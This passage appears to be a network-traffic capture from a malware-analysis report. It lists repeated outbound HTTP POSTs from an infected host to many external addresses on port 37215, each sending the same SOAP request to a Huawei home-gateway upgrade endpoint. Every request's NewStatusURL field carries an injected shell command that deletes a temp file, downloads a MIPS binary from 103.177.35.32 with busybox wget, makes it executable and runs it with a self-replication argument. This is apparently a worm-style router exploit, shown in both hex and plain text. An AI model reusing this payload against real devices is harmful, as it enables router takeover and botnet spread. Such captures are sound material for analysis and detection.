                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.2353688197.7.125.21937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312551022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.235394441.108.135.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312562943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.234742241.109.138.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312562943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.233945641.217.161.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312570095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.2350072157.43.17.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312578917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.2336580220.146.227.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312587976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.233793441.56.70.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312640905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.2344436182.100.45.7737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312664986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.2349266115.159.110.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312670946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.2344512146.216.38.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312670946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
